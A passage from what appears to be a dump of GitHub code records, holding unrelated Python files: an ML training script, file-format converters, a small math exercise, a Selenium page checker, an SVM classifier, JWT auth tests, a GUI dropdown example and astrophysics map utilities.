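IterLoader in the dist_train.py record turns a finite dataloader into an endless one, rebuilding the iterator and bumping an epoch counter whenever it runs dry. A trimmed stand-in (no sampler handling) driven by a plain list in place of a torch DataLoader:

```python
# Endless iteration over a finite loader; _epoch counts completed passes.
class IterLoader:
    def __init__(self, dataloader):
        self._dataloader = dataloader
        self.iter_loader = iter(self._dataloader)
        self._epoch = 0

    def __next__(self):
        try:
            return next(self.iter_loader)
        except StopIteration:
            self._epoch += 1
            self.iter_loader = iter(self._dataloader)
            return next(self.iter_loader)

loader = IterLoader([1, 2, 3])
print([next(loader) for _ in range(7)], loader._epoch)  # [1, 2, 3, 1, 2, 3, 1] 2
```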
evaluate(self.model, self.val_loader, False)\n IoU_dict[key] = IoU\n\n self.writer._log_eval(self.classNames, IoU_dict, epoch, iter)\n if checkpoint:\n self.checkpointer.checkpoint(epoch, iter, np.mean(IoU_dict['cam']))\n\n def train_epochwise(self):\n for epoch in range(self.start_epoch, cfg.TRAIN.NUM_EPOCHS + 1):\n # shuffle\n if hasattr(self.train_loader.sampler, 'set_epoch'):\n self.train_loader.sampler.set_epoch(epoch)\n\n self.train_epoch(epoch)\n\n with torch.no_grad():\n self.validation(epoch, self._iter - 1, True)\n\n self.writer.close()\n\n def train_iterwise(self):\n iter_loader = IterLoader(self.train_loader)\n for iter in range(self.start_iter, cfg.TRAIN.NUM_ITERS + 1):\n self.train_iter(iter, iter_loader)\n\n if iter % self.eval_period == 0:\n with torch.no_grad():\n self.validation(self._epoch, iter, True)\n\n\ndef main_worker(rank, num_gpus, args):\n if args.seed is not None:\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n cudnn.deterministic = True\n\n init_process_group('nccl', num_gpus, rank)\n\n if args.work_dir is None:\n cfg_name = osp.splitext(osp.basename(args.cfg_file))[0]\n dir_name = osp.split(osp.dirname(args.cfg_file))[1]\n cfg.WORK_DIR = osp.join('work_dirs', dir_name, cfg_name)\n else:\n cfg.WORK_DIR = args.work_dir\n\n if is_main_process():\n if not osp.exists(cfg.WORK_DIR):\n os.makedirs(cfg.WORK_DIR, 0o775)\n\n # Reading the config\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n train_dataset = build_dataset(cfg, cfg.DATASET.TRAIN_SPLIT, test_mode=False)\n val_dataset = build_dataset(cfg, 'val', test_mode=True)\n\n train_loader = build_dataloader(\n train_dataset,\n batch_size=cfg.TRAIN.BATCH_SIZE,\n shuffle=True,\n drop_last=True,\n pin_memory=True,\n num_workers=cfg.TRAIN.NUM_WORKERS)\n\n val_loader = build_dataloader(\n val_dataset,\n batch_size=num_gpus,\n shuffle=False,\n drop_last=False,\n pin_memory=True,\n num_workers=cfg.TRAIN.NUM_WORKERS)\n\n if is_enabled():\n cfg.NET.BN_TYPE = 'syncbn'\n\n model = Trainer.build_model(cfg)\n kwargs = {\n \"base_lr\": cfg.TRAIN.LR,\n \"wd\": cfg.TRAIN.WEIGHT_DECAY,\n \"batch_size\": cfg.TRAIN.BATCH_SIZE,\n \"world_size\": num_gpus,\n }\n param_groups = model.parameter_groups(**kwargs)\n optim = Trainer.build_optim(param_groups, cfg.TRAIN)\n max_epochs = cfg.TRAIN.NUM_EPOCHS\n max_iters = cfg.TRAIN.NUM_EPOCHS * len(train_dataset) // cfg.TRAIN.BATCH_SIZE\n lr_sche = LrScheduler(cfg, max_epochs, max_iters, optim)\n\n checkpointer = Checkpointer(cfg.WORK_DIR, max_n=3)\n checkpointer.add_model(model, optim)\n\n writer = Writer(cfg.WORK_DIR)\n writer._build_writers()\n\n if args.resume is not None:\n checkpointer.load(args.resume)\n\n # to ddp model\n model = convert_model(model, find_unused_parameters=True)\n\n trainer = Trainer(cfg, model, optim, lr_sche, train_loader, val_loader, writer, checkpointer)\n if is_main_process():\n trainer.writer.logger_writer.info(model)\n trainer.writer.logger_writer.info(\"Config: \")\n trainer.writer.logger_writer.info(cfg)\n if cfg.TRAIN.MODE == 'iter':\n trainer.train_iterwise()\n elif cfg.TRAIN.MODE == 'epoch':\n trainer.train_epochwise()\n\n\ndef main():\n args = get_arguments(sys.argv[1:])\n\n num_gpus = args.num_gpus\n\n if num_gpus > 1:\n # Use torch.multiprocessing.spawn to launch distributed processes: the\n # main_worker process function\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = args.port\n mp.spawn(main_worker, nprocs=num_gpus, args=(num_gpus, args))\n 
else:\n # Simply call main_worker function\n main_worker(0, num_gpus, args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sennnnn/semseg_benchmark","sub_path":"tools/dist_train.py","file_name":"dist_train.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17887707729","text":"import tkinter.messagebox as messagebox\nimport xlrd\n\nfrom xml.etree import ElementTree as ET\nfrom xml.dom.minidom import parse\n\ndef xls_xml(file_path,file_name):\n def read(file):\n try:\n data = xlrd.open_workbook(file)\n return data\n except Exception: # was IndentationError, which open_workbook never raises\n print(\"failed to read the workbook\")\n def writexml(data):\n\n index = 0\n names = locals()\n nrowsName = locals()\n Block = ET.Element(\"std_no\")\n Block.text= file_name\n\n xx=0\n for block in data.sheet_names():\n nameB = block\n sheet = data.sheet_by_index(index)\n index =index +1\n names['block%d ' %index] = ET.SubElement(Block ,nameB)\n if xx==0:\n e1=ET.SubElement(Block,\"text_table\")\n e1.text = \"\"\n e=e1\n elif xx==1:\n e2=ET.SubElement(Block,\"compute_table\")\n e2.text = \"\"\n e=e2\n else:\n e3=ET.SubElement(Block,\"byte_table\")\n e3.text = \"\"\n e=e3\n pass\n xx+=1\n\n\n\n nrows = sheet.nrows\n nclos = sheet.ncols\n flag = 0\n\n for i in range(nrows):\n\n if flag!=0 and flag!=1:\n if xx == 1:\n nrowsName[\"nrow%d\" % i] = ET.SubElement(e ,'text_block') # %-formatting; \"nrow%d\".format(i) never substituted i, so every row shared one key\n elif xx == 2:\n nrowsName[\"nrow%d\" % i] = ET.SubElement(e ,'func_block')\n elif xx == 3:\n nrowsName[\"nrow%d\" % i] = ET.SubElement(e ,'byte_block')\n index1 = 0\n\n\n for j in range(nclos):\n nn= ET.SubElement(nrowsName[\"nrow%d\" % i], str(sheet.cell(1, j).value))\n str0=str(sheet.cell(i, j).value)\n\n if str0 == \"\": # == for equality; 'is' compares object identity\n str0 = \"null\"\n\n if str(str0[-2:]) == '.0':\n str0 = str(str0[:-2])\n else:\n str0 = str(str0)\n # if index1==0 or index1==1:\n # try:\n # str0 = str(int(float(str0)))\n # except:\n #\n # str0=str0\n # pass\n\n\n\n index1 += 1\n nn.text = str0\n\n flag+=1\n\n\n tree = ET.ElementTree(Block)\n\n tree.write(\"xx01.xml\", encoding=\"utf-8\")\n\n\n def build_sitemap():\n urlset = ET.Element(\"牛皮\") # set up a root node\n url = ET.SubElement(urlset, \"牛\") # create a child node under the root\n loc = ET.SubElement(url, '二牛')\n loc.text = \"百度\"\n lastmod = ET.SubElement(url, \"三牛\")\n lastmod.text = \"2017-10-10\"\n changefreq = ET.SubElement(url, \"死牛\")\n changefreq.text = \"daily\"\n priority = ET.SubElement(url, \"五牛\")\n priority.text = \"1.0\"\n tree = ET.ElementTree(urlset)\n tree.write(\"sitemap.xml\", encoding=\"utf-8\")\n\n pass\n\n\n def prettyXml(element, indent, newline, level=0): # element is the Element passed in; indent is the indent string, newline the line separator\n if element: # does element have child elements?\n if element.text == None or element.text.isspace(): # element's text is empty\n element.text = newline + indent * (level + 1)\n else:\n element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * (level + 1)\n # else: # uncommenting these two lines puts the Element's text on its own line as well\n # element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * level\n temp = list(element) # convert element to a list of children\n for subelement in temp:\n if temp.index(subelement) < (len(temp) - 1): # not the last child: the next line starts a sibling, so keep the same indent\n subelement.tail = newline + indent * (level + 1)\n else: # last child: the next line closes the parent, so indent one level less\n subelement.tail = newline + indent * level\n prettyXml(subelement, indent, newline, level=level + 1) # recurse into the child element
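\n\n # Editor's note (illustrative sketch): prettyXml is defined but never called in this\n # file. A plausible use, with hypothetical names and inside writexml where Block is\n # in scope, would be:\n #   prettyXml(Block, '    ', '\\n')\n #   ET.ElementTree(Block).write('pretty.xml', encoding='utf-8')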
\n\n # name of the X.xlsx workbook\n data = read(file_path)\n # print(len(data.sheet_names()))\n #\n\n #\n # sheet1 = data.sheet_by_index(1)\n #\n # nrows = sheet1.nrows\n # ncols = sheet1.ncols\n # for i in range(0,nrows):\n # for j in range(0,ncols):\n # sheet1R = sheet1.cell(0,j).value\n # print(sheet1R)\n writexml(data)\n\n tree = ET.parse(\"xx01.xml\")\n root = tree.getroot()\n for delete_node in root.findall('文字表'):\n print(delete_node)\n root.remove(delete_node)\n for delete_node in root.findall('计算表'):\n root.remove(delete_node)\n for delete_node in root.findall('标记示例表'):\n root.remove(delete_node)\n tree.write(\"xx01.xml\",encoding='utf-8')\n doc = parse(\"xx01.xml\")\n f = open(file_name+'.xml', 'w' ,encoding='utf-8')\n doc.writexml(f, addindent=' ', newl='\\n', encoding='utf-8')\n f.close()\n messagebox.showinfo('Message', '完成')","repo_name":"weruuu/Program","sub_path":"Python/File_Trans/XLS_XML.py","file_name":"XLS_XML.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9730538385","text":"#!/usr/bin/python3\n'''\nconverts riscv binary file to ihex format\n3 Jun 2022 - initial file. btko\n'''\nimport sys\n\t\t\t\ndef twos_comp(val, bits):\n\treturn((val ^ 2**bits-1) + 1)\n\n\t\ndef checksumit(bytecount, address, recordtype, data):\n\tsum = 0\n\tvalue = data\n\tvalue += recordtype << (4*8)\n\tvalue += address << (5*8)\n\tvalue += bytecount << (7*8)\n\t\n\tfor i in range(8):\n\t\tsum += (0xff & (value >> (8*i)))\n\tsum = sum & 0xff\n\treturn f\":{value:0{16}X}{twos_comp(sum, 8) & 0xff:0{2}X}\" # mask to 8 bits: twos_comp(0, 8) is 256, which would print three digits\n\t\n\n\t\t\t\t\nif __name__ == \"__main__\":\n\tbytecount = 4\n\taddress = 0\n\trecordtype = 0\n\tif len(sys.argv) < 3: # needs both an input and an output file\n\t\tprint('v'*50)\n\t\tprint('__RiscV binary to Intel Hex converter__')\n\t\tprint(f'usage:\\n\\t {sys.argv[0]} <infile.bin> <outfile.hex>')\n\t\tprint('^'*50)\n\t\tsys.exit()\n\tinfilename = sys.argv[1]\n\toutfilename = sys.argv[2]\n\t\n\tihex = open(outfilename, 'w')\n\t\n\twith open(infilename, 'rb') as f:\n\t\twhile True:\n\t\t\tchunk = f.read(bytecount)\n\t\t\tif chunk:\n\t\t\t\tdata = int.from_bytes( chunk, 'little' )\n\t\t\t\tihex.write(str(checksumit(bytecount, address, recordtype, data)) + '\\n')\n\t\t\t\taddress += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tihex.write(\":00000001FF\"+'\\n')\n\n\tihex.close()
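\n\t# Editor's note, a worked example derived from checksumit above: the four input\n\t# bytes 13 00 00 00 (a RISC-V NOP, read little-endian) at record address 0 yield\n\t# ':0400000000000013E9' -- count 04, address 0000, type 00, data word 00000013,\n\t# and checksum E9, the two's complement of the byte sum 0x17.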
done\")\n\t\t\n","repo_name":"bbttko/PicoRV-TangNano9K","sub_path":"tools/bin2hex.py","file_name":"bin2hex.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2490777185","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 31 10:17:17 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\n#算两数的最小公倍数\r\ndef lcm(num1,num2):\r\n num = num1*num2\r\n i = 1\r\n a = True\r\n while a or i<=(num1*num2):\r\n if i%num1 == 0 and i%num2 == 0:\r\n a = False\r\n return i\r\n else:\r\n i += 1\r\n\r\nprint(lcm(24,12))\r\n \r\n \r\n ","repo_name":"Jireh-Fang/one-hundred-exercise-problem","sub_path":"49.py","file_name":"49.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29609802368","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import date\nfrom datetime import datetime\n\nurl_file = [line.rstrip('\\n') for line in open('url.txt')]\nfile = open(\"sokrati-\"+str(date.today())+\".txt\", 'w')\nfor url in url_file:\n print('Searching for url: '+ url)\n chrome_options = Options() \n chrome_options.add_argument(\"--headless\") \n chrome_options.binary_location = 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n\n driver = webdriver.Chrome('E:/chromedriver.exe',chrome_options=chrome_options)\n driver.get(url)\n delay = 10 # seconds\n try:\n WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.XPATH, \"//script[contains(@src,'sokrati')]\")))\n msg = \"Sokrati tracking found!\"\n file.write(url + '\\t' + msg + '\\n' ) \n driver.quit()\n \n except TimeoutException:\n msg = \"Sokrati tracking is not present\"\n file.write(url + '\\t' + msg + '\\n' )\n driver.quit()\nfile.close()\n \n","repo_name":"frameworkfarmer/tracker-tracker","sub_path":"tracker_tracker.py","file_name":"tracker_tracker.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38032687432","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport preprocessingData as pr\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.metrics import roc_curve, roc_auc_score\r\nfrom sklearn import svm\r\n\r\n\r\nclass svmClassifier:\r\n def __init__(self):\r\n self.preproc = pr.preprocessingData()\r\n self.preproc.standardizeRobData()\r\n self.preproc.getkernelacpReduction()\r\n self.dataPCA = self.preproc.dataPCA\r\n self.labels = self.preproc.labels\r\n\r\n\r\n def trainingAnalyse(self):\r\n self.score_acc = 0.80\r\n self.nlayer = 0\r\n for i in range(10000):\r\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.preproc.data.values[0:768, 0:8], self.labels, test_size=0.3)\r\n self.svc = svm.SVC(kernel='rbf',)\r\n self.svc.fit(self.X_train, self.y_train)\r\n self.trainingScore = self.svc.score(self.X_train, self.y_train)\r\n self.accuracyScore = self.svc.score(self.X_test, self.y_test)\r\n if(self.accuracyScore > self.trainingScore and self.accuracyScore >= 
\r\n self.score_acc = self.accuracyScore\r\n print(self.score_acc)\r\n\r\n def frontieredeDecision(self):\r\n cmp = np.array(['r', 'g'])\r\n #plt.scatter(self.X_train[:,0],self.X_train[:,1],c=cmp[self.y_train],s=5,edgecolors='none')\r\n plt.scatter(self.X_test[:, 0], self.X_test[:, 1], c='none', s=5, edgecolors=cmp[self.y_test])\r\n nx, ny = 400, 400\r\n x_min, x_max = plt.xlim()\r\n y_min, y_max = plt.ylim()\r\n xx, yy = np.meshgrid(np.linspace(x_min, x_max, nx), np.linspace(y_min, y_max, ny))\r\n Z = self.svc.predict_proba(np.c_[xx.ravel(), yy.ravel()])\r\n Z = Z[:, 1].reshape(xx.shape) # keep only P(class 1); predict_proba returns one column per class, so the raw array cannot reshape to the grid\r\n plt.contour(xx, yy, Z, [0.5])\r\n plt.show()\r\n\r\n def crossingValidationsvm(self):\r\n pipeline = make_pipeline(svm.SVC(probability=True))\r\n kf = KFold(n_splits=10, shuffle=True, random_state=1)\r\n cv_results = cross_val_score(pipeline, self.X_train, self.y_train, cv=kf, scoring=\"accuracy\")\r\n cv_results.mean()\r\n target_probabilities = pipeline.fit(self.X_train, self.y_train).predict_proba(self.X_test)[:, 1] # probabilities, not hard labels, are what the ROC curve needs\r\n\r\n false_positive_rate, true_positive_rate, threshold = roc_curve(self.y_test, target_probabilities)\r\n plt.title(\"Receiver Operating Characteristic\")\r\n plt.plot(false_positive_rate, true_positive_rate)\r\n plt.plot([0, 1], ls=\"--\")\r\n plt.plot([0, 0], [1, 0], c=\".7\"), plt.plot([1, 1], c=\".7\")\r\n plt.ylabel(\"True Positive Rate\")\r\n plt.xlabel(\"False Positive Rate\")\r\n plt.show()\r\n print(roc_auc_score(self.y_test, target_probabilities))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"mallocp/Risque-diab-tique","sub_path":"svmClassifier.py","file_name":"svmClassifier.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25160803407","text":"import unittest\nfrom unittest.mock import Mock\n\nfrom fastapi import HTTPException\n\nfrom src.shared.auth_bearer_validator import AuthBearerValidator\nfrom tests.utils.bearer_token_utils import JWTGenerator\n\n\nclass TestJWTBearer(unittest.IsolatedAsyncioTestCase):\n \"\"\"Testing Auth Bearer Shared module\"\"\"\n\n def setUp(self) -> None:\n self.token_generator = JWTGenerator()\n\n def generate_mock_request_by_token(self, token: str):\n request = Mock()\n request.headers = {\"Authorization\": f\"Bearer {token}\"}\n\n return request\n\n async def test_request_with_valid_token(self):\n valid_token = self.token_generator.generate_valid_token()\n request = self.generate_mock_request_by_token(valid_token)\n\n jwt_bearer = AuthBearerValidator()\n response = await jwt_bearer.__call__(request)\n\n self.assertIsInstance(response, dict)\n\n async def test_request_with_invalid_token(self):\n invalid_token = self.token_generator.generate_invalid_token()\n request = self.generate_mock_request_by_token(invalid_token)\n\n jwt_bearer = AuthBearerValidator()\n\n try:\n await jwt_bearer.__call__(request)\n except HTTPException as err:\n self.assertEqual(err.status_code, 403)\n else:\n raise HTTPException\n\n async def test_request_with_expired_token(self):\n expired_token = self.token_generator.generate_expired_token()\n request = self.generate_mock_request_by_token(expired_token)\n\n jwt_bearer = AuthBearerValidator()\n\n try:\n await jwt_bearer.__call__(request)\n except HTTPException as err:\n self.assertEqual(err.status_code, 403)\n else:\n raise 
HTTPException\n","repo_name":"vschmidt/template_fastapi","sub_path":"tests/unit/shared/test_auth_bearer_validator.py","file_name":"test_auth_bearer_validator.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37973329786","text":"\"\"\"We show here how to set up a drop down list (list of predefined choices that the user can click)\"\"\"\n#tags: DropDownListButton, events handling, DropDownList, choices, drop down, drop down list, list menu, list, Labelled\n\nimport pygame, thorpy as tp\n\npygame.init()\n\nW, H = 1200, 700\nscreen = pygame.display.set_mode((W,H))\ntp.init(screen, tp.theme_human) #bind screen to gui elements and set theme\n\nbck = pygame.image.load(tp.fn(\"data/bck.jpg\")) #load some background pic for testing\nbck = pygame.transform.smoothscale(bck, (W,H))\ndef before_gui(): #add here the things to do each frame before blitting gui elements\n screen.blit(bck, (0,0)) #blit background pic\ntp.call_before_gui(before_gui) #tells thorpy to call before_gui() before drawing gui.\n\nddl1 = tp.DropDownListButton((\"One\", \"Two\", \"Three\"))\nddl1_labelled = tp.Labelled(\"First example\", ddl1)\n\nddl2 = tp.DropDownListButton((\"One\", \"Two\", \"Three\"), title=\"Two\", choice_mode=\"h\")\nddl2_labelled = tp.Labelled(\"Second example\", ddl2)\n\n#all the arguments except the first one (the actual choices) are optional:\nddl3 = tp.DropDownListButton((\"Beginner\", \"Intermediate\", \"Expert\", \"Pro\"),\n title=None, #by default, will take the first value\n choice_mode=\"v\", #'v' for vertical or 'h' for horizontal\n align=\"left\", #how to align choices in the list\n launch_nonblocking=False, #launch mode\n size_limit=(\"auto\",\"auto\"), #limit size of the list of options\n all_same_width=True, #all choices same width\n generate_shadow=(True, \"auto\"))#[0] : does generate shadow ? [1] : fast method or accurate method ? you can set [1] = \"auto\"\n\nddl3_labelled = tp.Labelled(\"Third example\", ddl3)\n\n#to get the value of any my_ddl, just call my_ddl.get_value()\n\ngroup = tp.Box([ddl1_labelled, ddl2_labelled, ddl3_labelled])\ngroup.center_on(screen)\ngroup.get_updater().launch()\npygame.quit()\n\n","repo_name":"YannThorimbert/Thorpy2","sub_path":"examples/_example_dropdownlist.py","file_name":"_example_dropdownlist.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"71568233768","text":"from __future__ import division\nimport numpy as np\nimport lib\nimport mapmod\nimport almmod\nimport fileutils\nimport psht\nimport subprocess\nimport shlex\nimport tempfile\n\ndef iter_over_all_but_one(ar, axis):\n if axis != ar.ndim - 1:\n for j in xrange(ar.shape[-1]):\n for it in iter_over_all_but_one(ar[..., j], axis):\n yield it\n else:\n if ar.ndim == 1:\n yield ar\n elif ar.ndim != 2:\n for j in xrange(ar.shape[-2]):\n for it in iter_over_all_but_one(ar[..., j, :], axis - 1):\n yield it\n else:\n for j in xrange(ar.shape[0]):\n yield ar[j, :]\n\n#def unravel_index(inds, index_\n\ndef getslice(ar, axis, ind):\n \"\"\"VERY handy utility routine to return a slice.\n\n Returns the ind'th slice along axis of array ar. 
Axis and ind can be lists\n or similar, in which case the nth element of axis corresponds to the nth \n element of ind\"\"\"\n\n shape = ar.shape\n if isinstance(axis, int):\n sl = (slice(None),) * axis + (ind,) + (Ellipsis,)\n elif len(axis) == 2:\n if axis[0] < axis[1]:\n sl = (slice(None),) * axis[0] + (ind[0],) + (slice(None),) * \\\n (axis[1] - axis[0] - 1) + (ind[1],) + (Ellipsis,)\n else:\n sl = (slice(None),) * axis[1] + (ind[1],) + (slice(None),) * \\\n (axis[0] - axis[1] - 1) + (ind[0],) + (Ellipsis,)\n else:\n raise NotImplementedError\n return sl\n\n\n\ndef alm2map(ad, nside):\n \"\"\"Determines (from whether pol_axis is set or not) whether or not to use\n polarization if polarization=True. If polarization=False, treats each alm\n as an independent alm.\n \"\"\"\n if ad.ordering == 'l-major':\n ad.switchordering()\n computer = psht.PshtMmajorHealpix(lmax=ad.lmax, nside=nside, alm=ad.alms,\n alm_polarization=ad.pol_axis, \n alm_axis=ad.ind_axis, \n map_axis=ad.ind_axis,\n map_polarization=ad.pol_axis)\n map = computer.alm2map()\n md = mapmod.MapData(nside, map=map, pol_axis=ad.pol_axis, \n pol_iter = ad.pol_iter, ordering='ring')\n return md\n\ndef map2alm(md, lmax, mmax=None, weights=None):\n \"\"\"Determines (from whether pol_axis is set or not) whether or not to use\n polarization if polarization=True. If polarization=False, treats each map\n as an independent map.\n \"\"\"\n if mmax is None:\n mmax = lmax\n if weights is None:\n #Try to find file based on data in md\n weights = 'weight_ring_n%05d.fits' % md.nside\n if isinstance(weights, str):\n weights = fileutils.read_file(weights)\n elif not isinstance(weights, np.ndarray):\n raise TypeError(\"Weights must be either filename or numpy array\")\n if weights.shape != (3, 2*md.nside):\n raise ValueError(\"Weights do not have the right shape\")\n computer = psht.PshtMmajorHealpix(nside=md.nside, lmax=lmax, mmax=mmax,\n map=md.map,\n alm_polarization=md.pol_axis, \n alm_axis=md.pix_axis, \n map_axis=md.pix_axis,\n map_polarization=md.pol_axis,\n weights=weights[0])\n alm = computer.map2alm()\n ad = almmod.AlmData(lmax, mmax=mmax, alms=alm, pol_axis=md.pol_axis, \n pol_iter=md.pol_iter, ordering='m-major')\n return ad\n\ndef alm2ps(ad):\n if ad.pol_axis is not None:\n if ad.pol_axis < ad.ind_axis:\n shape = list(ad.alms.shape[:ad.pol_axis] + (6,) + ad.alms.shape[ad.pol_axis+1:ad.ind_axis] + (ad.lmax + 1,) + ad.alms.shape[ad.ind_axis + 1:])\n else:\n shape = list(ad.alms.shape[:ad.ind_axis] + (ad.lmax + 1,) + ad.alms.shape[ad.ind_axis+1:ad.pol_axis] + (6,) + ad.alms.shape[ad.pol_axis + 1:])\n cd = almmod.ClData(ad.lmax, cls = np.zeros(shape), spec_axis=ad.pol_axis, spectra='all')\n else:\n shape = list(ad.alms.shape[:ad.ind_axis] + (ad.lmax + 1,) + ad.alms.shape[ad.ind_axis + 1:])\n cd = almmod.ClData(ad.lmax, cls=np.zeros(shape))\n if cd.spectra != ['TT']:\n raise NotImplementedError\n if cd.spectra == ['TT']:\n if ad.ordering == 'l-major':\n for l in range(ad.lmax + 1):\n sl = getslice(cd.cls, cd.cl_axis, l)\n ind1 = almmod.lm2ind((l, 0), lmmax=(ad.lmax, ad.mmax), \\\n ordering=ad.ordering)\n ind2 = almmod.lm2ind((l, min(l, ad.mmax)), \\\n lmmax=(ad.lmax, ad.mmax), ordering=ad.ordering)\n asl = list(getslice(ad.alms, ad.ind_axis, ind1))\n cd.cls[sl] += ad.alms[asl] ** 2\n asl[ad.ind_axis] = slice(ind1 + 1, ind2 + 1)\n cd.cls[sl] += 2 * np.sum((ad.alms[asl] * \\\n ad.alms[asl].conjugate()).real)\n cd.cls[sl] = cd.cls[sl] / (2 * l + 1)\n else:\n for l in range(ad.lmax + 1):\n sl = getslice(cd.cls, cd.cl_axis, l)\n for m in 
range(min(l, ad.mmax) + 1):\n asl = getslice(ad.alms, ad.ind_axis, almmod.lm2ind((l, m), \\\n lmmax=(ad.lmax, ad.mmax), ordering=ad.ordering))\n if m == 0:\n cd.cls[sl] += ad.alms[asl] ** 2\n else:\n cd.cls[sl] += 2 * (ad.alms[asl] * \\\n ad.alms[asl].conjugate()).real\n cd.cls[sl] = cd.cls[sl] / (2 * l + 1)\n return cd\n\ndef noisemap(noise_data, nside=None):\n \"\"\"Simulates a noise map.\n\n Now takes only diagonal noise values, but will eventually be able to\n simulate based on covariance matrices as well.\n\n \"\"\"\n if isinstance(noise_data, mapmod.MapData):\n #Assume that the noise is diagonal, and to be multiplied by a gaussian\n gauss = np.random.standard_normal(noise_data.map.shape)\n noisemap = gauss * noise_data.map\n noise = mapmod.MapData(nside=noise_data.nside, map=noisemap, \n pol_axis=noise_data.pol_axis, \n pol_iter=noise_data.pol_iter,\n ordering=noise_data.ordering)\n elif isinstance(noise_data, np.ndarray):\n if nside is None:\n raise ValueError(\"Must provide nside when noise_data is an array\")\n gauss = np.random.standard_normal(noise_data.shape)\n noisemap = gauss * noise_data # noise_data is already the sigma array here (an ndarray has no .map attribute)\n noise = mapmod.MapData(nside=nside, map=noisemap) # fixed typo: Mapdata -> MapData\n\n return noise\n\ndef plot(md, sig=(1,), min=None, max=None, prefix=None, ncols=None, \n common_bar=True):\n \"\"\"Uses map2png to plot a MapData map\"\"\"\n\n if prefix is None:\n prefix = 'testmap'\n\n ffile = prefix + '.fits'\n pfile = prefix + '.png'\n# if common_bar or len(sig) == 1:\n# subprocess.call(shlex.split(\"rm \" + ffile))\n# fileutils.write_file(ffile, md)\n# flags = []\n# if max is not None: flags.append('-max %f ' % max)\n# if min is not None: flags.append('-min %f ' % min)\n# for sigs in sig:\n# flags.append('-sig %2d ' % sigs)\n# if ncols is None:\n# ncols = int(np.sqrt(len(sig)))\n# flags.append('-ncol %2d' % ncols)\n# subprocess.call(shlex.split(\"map2png \" + ffile + \" \" + pfile + \n# \" -bar %s \" % ''.join(flags)))\n# subprocess.call(shlex.split(\"eog \" + pfile))\n# else:\n filelist = []\n for i in range(len(sig)):\n tffile = prefix + '%02d.fits' % i\n tpfile = prefix + '%02d.png' % i\n filelist.append(tpfile + ' ')\n subprocess.call(shlex.split(\"rm \" + tffile))\n fileutils.write_file(tffile, md, sig=(sig[i],))\n flags = []\n if max is not None: flags.append('-max %f ' % max[i])\n if min is not None: flags.append('-min %f ' % min[i])\n subprocess.call(shlex.split(\"map2png \" + tffile + \" \" + tpfile + \n \" -bar %s \" % ''.join(flags)))\n\n subprocess.call(shlex.split(\"rm \" + pfile))\n subprocess.call(shlex.split(\"montage -geometry +0+0 %s \" % ''.join(filelist) + pfile))\n subprocess.call(shlex.split(\"eog \" + pfile))\n\ndef map2gif(md, signal='all', prefix='testmap'):\n subprocess.call(shlex.split(\"rm \" + prefix + '.fits'))\n subprocess.call(shlex.split(\"rm \" + prefix + '.gif'))\n fileutils.write_file(prefix + '.fits', md)\n if signal == 'all':\n subprocess.call(shlex.split(\"map2gif -inp \" + prefix + \".fits -out \" + prefix + \".gif -bar true\"))\n subprocess.call(shlex.split(\"map2gif -inp \" + prefix + \".fits -out \" + prefix + \"2.gif -bar true -sig 2\"))\n subprocess.call(shlex.split(\"map2gif -inp \" + prefix + \".fits -out \" + prefix + \"3.gif -bar true -sig 3\"))\n","repo_name":"eirikgje/py_cmb_lib","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43714298238","text":"import spacy\nfrom spacy.training.example import Example\nimport json
